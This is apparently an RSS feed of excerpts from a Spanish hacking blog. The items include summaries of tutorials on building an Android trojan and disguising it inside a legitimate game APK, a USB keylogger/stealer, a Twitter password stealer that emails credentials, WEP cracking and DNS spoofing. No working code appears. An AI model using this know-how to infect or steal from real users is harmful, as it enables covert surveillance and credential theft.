&lt;p&gt;Hoy vengo a hablaros sobre una de las distribuciones «top» orientadas a la seguridad informática y pentesting, &lt;strong&gt;Parrot OS&lt;/strong&gt;, que junto a &lt;strong&gt;Kali Linux&lt;/strong&gt; y &lt;strong&gt;Bugtraq&lt;/strong&gt; son a día de hoy &lt;strong&gt;las más utilizadas&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Parrot OS es una &lt;strong&gt;distribución de Linux basada en Debian&lt;/strong&gt; con el kernel de Linux 4.3 (en su versión 2.2.1), ha sido desarrollada por &lt;strong&gt;un equipo de hackers italianos llamados FrozenBox, utiliza MATE 1.8.1 como escritorio&lt;/strong&gt; y debido a la gran cantidad de herramientas y la importancia de actualizarlas, &lt;strong&gt;tiene un modelo de actualización continua&lt;/strong&gt; (Rolling release).&lt;/p&gt;</description></item><item><title>Dendroid - Crea tu propio Troyano para Android - Parte III</title><link>https://hackpuntes.com/es/posts/dendroid-crea-tu-propio-troyano-para-android-parte-iii/</link><pubDate>Sun, 13 Sep 2015 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/dendroid-crea-tu-propio-troyano-para-android-parte-iii/</guid><description>&lt;p&gt;Esta será la &lt;strong&gt;última parte de configuración&lt;/strong&gt; de nuestro troyano para Android, en la cual bindearemos (fusionaremos o uniremos) la APK maliciosa generada en el &lt;a href="https://hackpuntes.com/dendroid-crea-tu-propio-troyano-para-android-parte-ii/"&gt;anterior tutorial&lt;/a&gt;
por nosotros con otra APK legítima de Google Play para camuflarla.&lt;/p&gt;
&lt;p&gt;Lo primero, deberemos de &lt;strong&gt;descargarnos una APK desde Google Play&lt;/strong&gt;, yo voy a elegir la APK de Angry Birds.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/dendroid-crea-tu-propio-troyano-para-android-parte-iii/dendroid-crea-tu-propio-troyano-para-android-parte-iii_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/dendroid-crea-tu-propio-troyano-para-android-parte-iii/dendroid-crea-tu-propio-troyano-para-android-parte-iii_001.webp" alt="Dendroid - Crea tu propio Troyano para Android - Parte III" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Existen muchas maneras de conseguir la APK desde Google Play, yo &lt;strong&gt;os explicaré dos posibilidades&lt;/strong&gt;, la primera &lt;strong&gt;accediendo directamente&lt;/strong&gt; en nuestro terminal a la ruta &lt;strong&gt;/data/app&lt;/strong&gt; (lugar donde se almacenan las APK cuando se descargan de Google Play antes de su instalación) y &lt;strong&gt;copiando la APK a nuestro PC&lt;/strong&gt; (esta opción es la más recomendada, pero posiblemente necesitemos ser root en nuestro terminal).&lt;/p&gt;</description></item><item><title>Dendroid - Crea tu propio Troyano para Android - Parte II</title><link>https://hackpuntes.com/es/posts/dendroid-crea-tu-propio-troyano-para-android-parte-ii/</link><pubDate>Thu, 09 Jul 2015 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/dendroid-crea-tu-propio-troyano-para-android-parte-ii/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/dendroid-crea-tu-propio-troyano-para-android-parte-ii/dendroid-crea-tu-propio-troyano-para-android-parte-ii_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/dendroid-crea-tu-propio-troyano-para-android-parte-ii/dendroid-crea-tu-propio-troyano-para-android-parte-ii_banner.webp" alt="Dendroid - Crea tu propio Troyano para Android - Parte II" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;En la &lt;a href="https://hackpuntes.com/dendroid-crea-tu-propio-troyano-para-android-parte-i/"&gt;entrada anterior&lt;/a&gt;
vimos como &lt;strong&gt;crear un panel de control&lt;/strong&gt; en un servidor web para administrar los dispositivos que infectaremos posteriormente, en esta entrada, os mostraré como crear una &lt;strong&gt;APK Maliciosa&lt;/strong&gt; para &lt;strong&gt;infectar dispositivos&lt;/strong&gt; que ejecuten el sistema operativo Android (Smartphone, Tablets, etc).&lt;/p&gt;
&lt;p&gt;Para este tutorial, necesitaremos tener instalado &lt;a href="http://www.eclipse.org/downloads/packages/eclipse-ide-java-ee-developers/marsr" target="_blank" rel="noopener noreferrer"&gt;Eclipse&lt;/a&gt;
+ &lt;a href="https://developer.android.com/sdk/installing/index.html?pkg=tools" target="_blank" rel="noopener noreferrer"&gt;SDK de Android&lt;/a&gt;
y tener instalado en el sistema el &lt;a href="http://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html" target="_blank" rel="noopener noreferrer"&gt;JDK&lt;/a&gt;
, si tenéis cualquier tipo de problema en instalarlo, podéis buscar en &lt;a href="https://www.google.es/webhp?sourceid=chrome-instant&amp;amp;ion=1&amp;amp;espv=2&amp;amp;es_th=1&amp;amp;ie=UTF-8#safe=off&amp;amp;q=eclipse&amp;#43;%2B&amp;#43;sdk&amp;#43;%2B&amp;#43;jdk" target="_blank" rel="noopener noreferrer"&gt;Google&lt;/a&gt;
, existen miles de tutoriales de como preparar Eclipse para el desarrollo de aplicaciones Android.&lt;/p&gt;</description></item><item><title>Dendroid - Crea tu propio Troyano para Android - Parte I</title><link>https://hackpuntes.com/es/posts/dendroid-crea-tu-propio-troyano-para-android-parte-i/</link><pubDate>Sat, 13 Jun 2015 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/dendroid-crea-tu-propio-troyano-para-android-parte-i/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/dendroid-crea-tu-propio-troyano-para-android-parte-i/dendroid-crea-tu-propio-troyano-para-android-parte-i_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/dendroid-crea-tu-propio-troyano-para-android-parte-i/dendroid-crea-tu-propio-troyano-para-android-parte-i_banner.webp" alt="Dendroid - Crea tu propio Troyano para Android - Parte I" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Android se ha convertido en el &lt;strong&gt;sistema operativo más utilizado&lt;/strong&gt; en nuestros dispositivos móviles, objeto por el cual &lt;strong&gt;ha sido blanco de muchos ciberdelincuentes&lt;/strong&gt;, que han pasado de atacar ordenadores personales a dispositivos móviles, puesto que es mas &lt;strong&gt;fácil de atacar&lt;/strong&gt;, cuenta en cierta medida con &lt;strong&gt;menos protección&lt;/strong&gt; y el porcentaje de &lt;strong&gt;ataque con éxito es mayor&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;En esta entrada os mostraré como &lt;strong&gt;crear nuestro propio troyano&lt;/strong&gt; para dispositivos Android, cada uno utilizará los conocimientos adquiridos en este tutorial con sus propios fines éticos, pero esto nos puede servir de gran ayuda en el caso que &lt;strong&gt;nuestro móvil se pierda o nos lo roben&lt;/strong&gt;, ya que tendremos total control sobre el dispositivo que infectemos, recordad que infectar un dispositivo ajeno al nuestro sin consentimiento del propietario puede ser un &lt;strong&gt;delito&lt;/strong&gt;.&lt;/p&gt;</description></item><item><title>XXE - XML External Entity - El Nuevo SQLi</title><link>https://hackpuntes.com/es/posts/xxe-xml-external-entity-el-nuevo-sqli/</link><pubDate>Sat, 30 May 2015 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/xxe-xml-external-entity-el-nuevo-sqli/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/xxe-xml-external-entity-el-nuevo-sqli/xxe-xml-external-entity-el-nuevo-sqli_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/xxe-xml-external-entity-el-nuevo-sqli/xxe-xml-external-entity-el-nuevo-sqli_banner.webp" alt="XXE - XML External Entity - El Nuevo SQLi" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;XXE (Xml eXternal Entity)&lt;/strong&gt; es un tipo de vulnerabilidad que se produce en aplicaciones que hacen uso de &lt;strong&gt;«parsers»&lt;/strong&gt; XML. Es decir aplicaciones que reciben como entrada un documento XML y para procesarlo hacen uso de alguna librería de parseo como LibXML, Xerces, MiniDOM, SAX etc. El atacante entonces puede aprovechar esta vulnerabilidad y enviar un documento XML especialmente manipulado para conseguir que el parser XML divulgue información del sistema, consuma recursos en exceso, ejecute comandos u otras formas de explotación.&lt;/p&gt;</description></item><item><title>Hacking Wifi - Parte VII - Seleccionar el Objetivo y capturar los paquetes</title><link>https://hackpuntes.com/es/posts/hacking-wifi-parte-vii-seleccionar-el-objetivo-y-capturar-los-paquetes/</link><pubDate>Sun, 24 May 2015 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/hacking-wifi-parte-vii-seleccionar-el-objetivo-y-capturar-los-paquetes/</guid><description>&lt;p&gt;Lo que intentaremos en esta entrada, será &lt;strong&gt;conseguir paquetes de la red objetivo&lt;/strong&gt; (evidentemente sin estar asociados a ella) y &lt;strong&gt;guardarlos&lt;/strong&gt; en un archivo con extension &lt;strong&gt;.PCAP&lt;/strong&gt; (Packet Capture Data), para que cuando tengamos suficientes &lt;strong&gt;IVs&lt;/strong&gt; crackearlo para obtener la clave.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/hacking-wifi-parte-vii-seleccionar-el-objetivo-y-capturar-los-paquetes/hacking-wifi-parte-vii-seleccionar-el-objetivo-y-capturar-los-paquetes_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/hacking-wifi-parte-vii-seleccionar-el-objetivo-y-capturar-los-paquetes/hacking-wifi-parte-vii-seleccionar-el-objetivo-y-capturar-los-paquetes_banner.webp" alt="Hacking Wifi - Parte VII - Seleccionar el Objetivo y capturar los paquetes" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Me he encontrado por casa un router que tenía sin utilizar para realizar esta entrada, lo he configurado con &lt;strong&gt;cifrado WEP&lt;/strong&gt; y he cambiado el &lt;strong&gt;SSID&lt;/strong&gt; (nombre de la red) a &lt;strong&gt;WiFi-Hackpuntes&lt;/strong&gt;.&lt;/p&gt;</description></item><item><title>Ataque DNS Spoofing con Cain&amp;Abel</title><link>https://hackpuntes.com/es/posts/ataque-dns-spoofing-con-cainabel/</link><pubDate>Thu, 07 May 2015 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/ataque-dns-spoofing-con-cainabel/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/ataque-dns-spoofing-con-cainabel/ataque-dns-spoofing-con-cainabel_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/ataque-dns-spoofing-con-cainabel/ataque-dns-spoofing-con-cainabel_banner.webp" alt="Ataque DNS Spoofing con Cain&amp;amp;Abel" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;En la entrada de hoy, os mostraré como realizar un &lt;strong&gt;ataque DNS Spoofing&lt;/strong&gt; en una red de area local, normalmente no suelo trabajar con Windows, pero en esta entrada lo utilizaremos, dado que la herramienta que vamos a trabajar solo está disponible para este SO.&lt;/p&gt;
&lt;p&gt;La herramienta se llama &lt;strong&gt;Cain&amp;amp;Abel&lt;/strong&gt;, y la podéis descargar de su &lt;strong&gt;pagina oficial&lt;/strong&gt; &lt;a href="http://www.oxid.it/cain.html" target="_blank" rel="noopener noreferrer"&gt;AQUI&lt;/a&gt;
, puede que vuestro navegador os indique que estáis a punto de descargar una &lt;strong&gt;herramienta potencialmente peligrosa&lt;/strong&gt;, de igual manera somos conscientes del uso de ella y aceptamos para descargarla.&lt;/p&gt;</description></item><item><title>Cómo crear un USB Keylogger/Stealer para recuperar contraseñas</title><link>https://hackpuntes.com/es/posts/como-crear-un-usb-keyloggerstealer-para-recuperar-contrasenas/</link><pubDate>Sat, 02 May 2015 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/como-crear-un-usb-keyloggerstealer-para-recuperar-contrasenas/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/como-crear-un-usb-keyloggerstealer-para-recuperar-contrasenas/como-crear-un-usb-keyloggerstealer-para-recuperar-contrasenas_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/como-crear-un-usb-keyloggerstealer-para-recuperar-contrasenas/como-crear-un-usb-keyloggerstealer-para-recuperar-contrasenas_banner.webp" alt="Cómo crear un USB Keylogger/Stealer para recuperar contraseñas" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Hace unas semana publiqué una entrada sobre &lt;strong&gt;Stealers&lt;/strong&gt; y expliqué lo que eran y para que servían, hoy vengo a explicaros como crear un USB que se autoejecute y &lt;strong&gt;recupere todas nuestras contraseñas del PC&lt;/strong&gt; de manera automática, únicamente con conectarlo a nuestro PC, sin tocar absolutamente nada, ademas tendrá una función Keylogger, que registrará en un archivo .txt todo lo que pulsemos en nuestro teclado mientras el USB esté conectado al PC.&lt;/p&gt;</description></item><item><title>Herramienta para recuperar los archivos cifrados por el ransomware TeslaCrypt</title><link>https://hackpuntes.com/es/posts/herramienta-para-recuperar-los-archivos-cifrados-por-el-ransomware-teslacrypt/</link><pubDate>Sat, 02 May 2015 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/herramienta-para-recuperar-los-archivos-cifrados-por-el-ransomware-teslacrypt/</guid><description>&lt;p&gt;Cifrar los archivos de la víctima y luego pedir bitcoins para descifrarlos es un negocio muy lucrativo: &lt;strong&gt;las campañas de ramsonware se están convirtiendo en una amenaza cada vez mayor&lt;/strong&gt;. Después de la caída de CryptoLocker surgió &lt;a href="https://es.wikipedia.org/wiki/CryptoLocker" target="_blank" rel="noopener noreferrer"&gt;Cryptowall&lt;/a&gt;
, con técnicas anti-depuración avanzadas, y después &lt;strong&gt;numerosas variantes que se incluyen en campañas dirigidas cada vez más numerosas&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Una de las últimas variantes se llama &lt;strong&gt;TeslaCrypt y parece ser un derivado del ransomware CryptoLocker original&lt;/strong&gt;. Este ransomware está &lt;strong&gt;dirigido específicamente a gamers&lt;/strong&gt; y, aunque dice estar usando RSA-2048 asimétrico para cifrar archivos, &lt;strong&gt;realmente está usando AES simétrico&lt;/strong&gt;, lo que ha permitido a &lt;a href="http://blogs.cisco.com/author/talos" target="_blank" rel="noopener noreferrer"&gt;Talos Group&lt;/a&gt;
(Talos Security Intelligence &amp;amp; Research Group) desarrollar una herramienta que descifra los archivos…&lt;/p&gt;</description></item><item><title>Hacking Wifi - Parte VI - Seguridad en redes Wi-Fi</title><link>https://hackpuntes.com/es/posts/hacking-wifi-parte-vi-seguridad-en-redes-wi-fi/</link><pubDate>Tue, 28 Apr 2015 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/hacking-wifi-parte-vi-seguridad-en-redes-wi-fi/</guid><description>&lt;p&gt;Antes de empezar a atacar una red Wi-Fi, &lt;strong&gt;tenemos que saber que tipo de seguridad tiene&lt;/strong&gt;, para posteriormente auditarla de la forma más eficiente y correcta posible.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/hacking-wifi-parte-vi-seguridad-en-redes-wi-fi/hacking-wifi-parte-vi-seguridad-en-redes-wi-fi_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/hacking-wifi-parte-vi-seguridad-en-redes-wi-fi/hacking-wifi-parte-vi-seguridad-en-redes-wi-fi_001.webp" alt="Hacking Wifi - Parte VI - Seguridad en redes Wi-Fi" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;No debemos de creer&lt;/strong&gt;, que únicamente consiguiendo la clave del Wi-Fi ya tendremos acceso a ella, puesto que únicamente hemos conseguido romper la &lt;strong&gt;seguridad a nivel de protocolo&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;La seguridad en las redes inalámbricas, se pueden diferenciar en dos grandes grupos: &lt;strong&gt;seguridad a nivel de enlace y seguridad a nivel de protocolo&lt;/strong&gt; mediante sistemas de cifrado de información.&lt;/p&gt;</description></item><item><title>Cómo usar tu pendrive como contraseña en Windows 7</title><link>https://hackpuntes.com/es/posts/como-usar-tu-pendrive-como-contrasena-en-windows-7/</link><pubDate>Thu, 23 Apr 2015 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/como-usar-tu-pendrive-como-contrasena-en-windows-7/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/como-usar-tu-pendrive-como-contrasena-en-windows-7/como-usar-tu-pendrive-como-contrasena-en-windows-7_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/como-usar-tu-pendrive-como-contrasena-en-windows-7/como-usar-tu-pendrive-como-contrasena-en-windows-7_banner.webp" alt="Cómo usar tu pendrive como contraseña en Windows 7" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Si eres de los que olvidas las contraseñas fácilmente o simplemente quieres otro método distinto para identificarte en Windows 7, en esta entrada te mostraré como puedes &lt;strong&gt;utilizar tu pendrive como contraseña&lt;/strong&gt; para Windows 7.&lt;/p&gt;
&lt;h2 id="pasos-a-seguir"&gt;Pasos a seguir&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;Inserta tu pendrive formateado en NTFS, si no sabes formatearlo en NTFS, haz &lt;strong&gt;«Click derecho»&lt;/strong&gt; sobre la unidad y en &lt;strong&gt;«Formatear»&lt;/strong&gt;.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/como-usar-tu-pendrive-como-contrasena-en-windows-7/como-usar-tu-pendrive-como-contrasena-en-windows-7_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/como-usar-tu-pendrive-como-contrasena-en-windows-7/como-usar-tu-pendrive-como-contrasena-en-windows-7_001.webp" alt="Cómo usar tu pendrive como contraseña en Windows 7" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Nueva vulnerabilidad SMB afecta a todas las versiones de Windows</title><link>https://hackpuntes.com/es/posts/nueva-vulnerabilidad-smb-afecta-a-todas-las-versiones-de-windows/</link><pubDate>Tue, 14 Apr 2015 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/nueva-vulnerabilidad-smb-afecta-a-todas-las-versiones-de-windows/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/nueva-vulnerabilidad-smb-afecta-a-todas-las-versiones-de-windows/nueva-vulnerabilidad-smb-afecta-a-todas-las-versiones-de-windows_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/nueva-vulnerabilidad-smb-afecta-a-todas-las-versiones-de-windows/nueva-vulnerabilidad-smb-afecta-a-todas-las-versiones-de-windows_banner.webp" alt="Nueva vulnerabilidad SMB afecta a todas las versiones de Windows" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.kb.cert.org/vuls/id/672268" target="_blank" rel="noopener noreferrer"&gt;Nuevo fallo al protocolo SMB&lt;/a&gt;
&lt;strong&gt;(Server Message Block)&lt;/strong&gt; que afecta a todas las versiones de Windows, esta vulnerabilidad ha sido clasificada como grave. Dicha vulnerabilidad &lt;strong&gt;permite que un atacante pueda robar las credenciales de servicios del usuario&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;El error está relacionado con la forma en que Windows y otro software manejan algunas peticiones HTTP, y los investigadores dicen que &lt;strong&gt;afecta a una amplia gama de aplicaciones, incluyendo iTunes y Adobe Flash, algunos clientes de GitHub, Oracle y AVG Anti-virus&lt;/strong&gt;. La vulnerabilidad, divulgada el lunes por los investigadores en Cylance, es una extensión de la investigación realizada por Aaron Spangler hace casi 20 años, conocida como “redirect to SMB”. Esta debilidad puede permitir a un atacante forzar a las víctimas para que se autentiquen mediante &lt;a href="http://www.estacion-informatica.com/2013/03/evita-hijacking-en-tu-cuenta.html" target="_blank" rel="noopener noreferrer"&gt;hijacking&lt;/a&gt;
en un servidor controlado por el atacante, mediante ataques &lt;a href="http://www.estacion-informatica.com/2015/03/lenovo-no-era-el-unico-con-superfish.html" target="_blank" rel="noopener noreferrer"&gt;man-in-the-middle&lt;/a&gt;
y luego enviarlos a servidores maliciosos SMB. Con lo que ello supone, robo de credenciales.&lt;/p&gt;</description></item><item><title>Desarrollo de un Stealer sencillo para Twitter en Visual Studio</title><link>https://hackpuntes.com/es/posts/desarrollo-de-un-stealer-sencillo-para-twitter-en-visual-studio/</link><pubDate>Sun, 12 Apr 2015 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/desarrollo-de-un-stealer-sencillo-para-twitter-en-visual-studio/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/desarrollo-de-un-stealer-sencillo-para-twitter-en-visual-studio/desarrollo-de-un-stealer-sencillo-para-twitter-en-visual-studio_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/desarrollo-de-un-stealer-sencillo-para-twitter-en-visual-studio/desarrollo-de-un-stealer-sencillo-para-twitter-en-visual-studio_banner.webp" alt="Desarrollo de un Stealer sencillo para Twitter en Visual Studio" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;No os sorprendáis, &lt;strong&gt;Twitter no ha lanzado&lt;/strong&gt; un aplicación para PC, en la entrada de hoy vengo a enseñaros como desarrollar un &lt;strong&gt;Stealer&lt;/strong&gt; para la &lt;strong&gt;obtención de usuarios y contraseñas&lt;/strong&gt; de esta red social, posteriormente lo programaremos para que nos envie lo &lt;strong&gt;«recolectado»&lt;/strong&gt; a nuestro correo.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Todo lo que publico en mi blog, lo hago con fines educativos y de aprendizaje, por lo tanto no me hago responsable del mal uso que algunos puedan darle al conocimiento adquirido en este blog.&lt;/strong&gt;&lt;/p&gt;</description></item><item><title>Hacking Wifi - Parte V - Modificando la dirección MAC con macchanger</title><link>https://hackpuntes.com/es/posts/hacking-wifi-parte-v-modificando-la-direccion-mac-con-macchanger/</link><pubDate>Thu, 09 Apr 2015 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/hacking-wifi-parte-v-modificando-la-direccion-mac-con-macchanger/</guid><description>&lt;p&gt;&lt;strong&gt;La dirección MAC&lt;/strong&gt; de la tarjeta de red o dirección física, es un identificador de 48 &lt;a href="https://es.wikipedia.org/wiki/Bit" target="_blank" rel="noopener noreferrer"&gt;bits&lt;/a&gt;
(6 bloques &lt;a href="https://es.wikipedia.org/wiki/Sistema_hexadecimal" target="_blank" rel="noopener noreferrer"&gt;hexadecimales&lt;/a&gt;
) que identifica de manera inequívoca a un dispositivo de red, &lt;strong&gt;es una de las maneras más fáciles de&lt;/strong&gt; rastrear e &lt;strong&gt;identificar un equipo&lt;/strong&gt; al &lt;strong&gt;no existir dos direcciones MAC iguales&lt;/strong&gt; en el mundo.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/hacking-wifi-parte-v-modificando-la-direccion-mac-con-macchanger/hacking-wifi-parte-v-modificando-la-direccion-mac-con-macchanger_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/hacking-wifi-parte-v-modificando-la-direccion-mac-con-macchanger/hacking-wifi-parte-v-modificando-la-direccion-mac-con-macchanger_001.webp" alt="Hacking Wifi - Parte V - Modificando la dirección MAC con macchanger" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="como-es-posible-que-no-se-repitan-y-sean-únicas"&gt;¿Como es posible que no se repitan y sean únicas?&lt;/h2&gt;
&lt;p&gt;El &lt;strong&gt;Instituto de Ingeniería Eléctrica y Electrónica (IEEE)&lt;/strong&gt; es la que le asigna los &lt;strong&gt;primeros 24 bits a los fabricantes de tarjetas de red y los otros 24 bits quedan a elección del fabricante&lt;/strong&gt; de tarjetas de red. Por supuesto bajo supervisión y respetando que no se repitan ninguna dirección MAC.&lt;/p&gt;</description></item><item><title>Hacking Wifi - Parte IV - Comandos Básicos</title><link>https://hackpuntes.com/es/posts/hacking-wifi-parte-iv-comandos-basicos/</link><pubDate>Sun, 05 Apr 2015 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/hacking-wifi-parte-iv-comandos-basicos/</guid><description>&lt;p&gt;En esta parte de entradas sobre hacking wifi, vamos a empezar a trabajar con nuestra tarjeta de red inalámbrica y a conocer los &lt;strong&gt;comandos básicos&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Uno de los comandos básicos que siempre debemos de utilizar para comprobar que nuestra tarjeta de red &lt;strong&gt;ha sido aceptada por el sistema operativo&lt;/strong&gt; es:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;ifconfig
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Este comando permite configurar numerosos parámetros de las interfaces de red, como la direccion IP o la máscara de red. &lt;strong&gt;Si se llama sin argumentos&lt;/strong&gt; (como la acabo de llamar yo) &lt;strong&gt;muestra la configuración vigente&lt;/strong&gt; de las interfaces de red &lt;strong&gt;activas&lt;/strong&gt; (con esto confirmamos que la tarjeta de red inalámbrica ha sido aceptada por el sistema y no es necesario drivers para ponerla en funcionamiento), con detalles como la direccion MAC o el tráfico que ha circulado por las mismas hasta el momento.&lt;/p&gt;</description></item><item><title>Miles de cuentas de Uber, supuestamente vendidas en la deep web</title><link>https://hackpuntes.com/es/posts/miles-de-cuentas-de-uber-supuestamente-vendidas-en-la-deep-web/</link><pubDate>Sat, 04 Apr 2015 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/miles-de-cuentas-de-uber-supuestamente-vendidas-en-la-deep-web/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/miles-de-cuentas-de-uber-supuestamente-vendidas-en-la-deep-web/miles-de-cuentas-de-uber-supuestamente-vendidas-en-la-deep-web_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/miles-de-cuentas-de-uber-supuestamente-vendidas-en-la-deep-web/miles-de-cuentas-de-uber-supuestamente-vendidas-en-la-deep-web_banner.webp" alt="Miles de cuentas de Uber, supuestamente vendidas en la deep web" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;El medio online Motherboard &lt;a href="https://www.vice.com/en/article/stolen-uber-customer-accounts-are-for-sale-on-the-dark-web-for-1/" target="_blank" rel="noopener noreferrer"&gt;ha informado&lt;/a&gt;
recientemente de algo serio. &lt;strong&gt;Miles de cuentas de usuario de Uber se estarían vendiendo en la deep web&lt;/strong&gt; (concretamente en un portal relativamente nuevo llamado AlphaBay), a un precio que cualquiera se puede permitir: un dólar. Hay vendedores que presumen de tener varios miles de esas cuentas en oferta, en forma de las contraseñas que se necesitan para entrar en ellas, e incluso se venden en packs con descuento.&lt;/p&gt;</description></item><item><title>SPARTA - La Caja de Herramientas del Pentester</title><link>https://hackpuntes.com/es/posts/sparta-la-caja-de-herramientas-del-pentester/</link><pubDate>Tue, 31 Mar 2015 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/sparta-la-caja-de-herramientas-del-pentester/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/sparta-la-caja-de-herramientas-del-pentester/sparta-la-caja-de-herramientas-del-pentester_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/sparta-la-caja-de-herramientas-del-pentester/sparta-la-caja-de-herramientas-del-pentester_banner.webp" alt="SPARTA - La Caja de Herramientas del Pentester" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;SPARTA es una &lt;strong&gt;aplicación GUI&lt;/strong&gt; (Interfaz Gráfica de Usuario) &lt;strong&gt;escrita en Python&lt;/strong&gt;, con la cual nos simplifica las &lt;strong&gt;pruebas de penetración&lt;/strong&gt; en una determinada infraestructura de red y nos permite realizar diversas pruebas de penetración en la &lt;strong&gt;fase de escaneo y enumeración&lt;/strong&gt;. Estas cualidades permite al pentester &lt;strong&gt;ahorrar tiempo&lt;/strong&gt; en el momento de realizar una auditoria. SPARTA &lt;strong&gt;equivale&lt;/strong&gt; a tener acceso a su &lt;strong&gt;caja de herramientas&lt;/strong&gt; en la cual nos muestra toda la producción de las herramientas de una manera conveniente y ordenada.&lt;/p&gt;</description></item><item><title>Accediendo al sistema de control de las gasolineras</title><link>https://hackpuntes.com/es/posts/accediendo-al-sistema-de-control-de-las-gasolineras/</link><pubDate>Sun, 29 Mar 2015 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/accediendo-al-sistema-de-control-de-las-gasolineras/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/accediendo-al-sistema-de-control-de-las-gasolineras/accediendo-al-sistema-de-control-de-las-gasolineras_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/accediendo-al-sistema-de-control-de-las-gasolineras/accediendo-al-sistema-de-control-de-las-gasolineras_banner.webp" alt="Accediendo al sistema de control de las gasolineras" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
